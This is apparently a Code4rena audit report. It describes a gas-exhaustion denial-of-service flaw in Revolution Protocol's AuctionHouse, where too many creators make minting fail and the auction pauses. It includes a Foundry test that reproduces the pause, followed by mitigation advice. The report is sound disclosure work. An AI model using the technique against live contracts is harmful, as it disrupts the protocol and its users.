Revolution Protocol - wintermute's results

Lines of code

https://github.com/code-423n4/2023-12-revolutionprotocol/blob/d42cc62b873a1b2b44f57310f9d4bbfdd875e8d6/packages/revolution/src/AuctionHouse.sol#L311

Vulnerability details

Impact

Malicious actor can pause AuctionHouse or it can happen or by accedent. Admin actions needed to unpause it. This would be bad expirience for users, inconvenient for admin and can damage long term protocol viability because need of constantly monitoring pause state by admin.

Proof of Concept

Add this to AuctionBasic.t.sol:

function testAuctionCreationDOS_gas() public {
   // create piece with lots of creators
    address[] memory creators = new address[](100);
    for (uint160 i; i < 100; i++) creators[i] = address(i+1);
    uint[] memory bps = new uint[](100);
    bps[0] = 10_000;
    createArtPieceMultiCreator(
        "test",
        "test",
        ICultureIndex.MediaType.IMAGE,
        "test",
        "test",
        "test",
        creators,
        bps
    );

    // unpausing auction triggers create new auction rutine same as when settleCurrentAndCreateNewAuction
    vm.expectEmit(true, true, true, true);
    emit PausableUpgradeable.Paused(address(dao));
    address(auction).call{gas: 1_000_000}(abi.encodeWithSelector(auction.unpause.selector));
}

When art piece have a lot of creatorss, 750_000 gas threshold is insufficient to write all creators to Verbs storage. Mint will revert because of OOG and pause triggered.

This happens because writing 1 creator to storage costs ~20K gas, 20K * 100 > 750_000.

Tools Used

www.evm.codes Manual Review

Recommended Mitigation Steps

Raise threshold of lower max amount of creators. Another solution would be revert if return data if mint call is empty and it's (likely) because of OOG.

Assessed type

DoS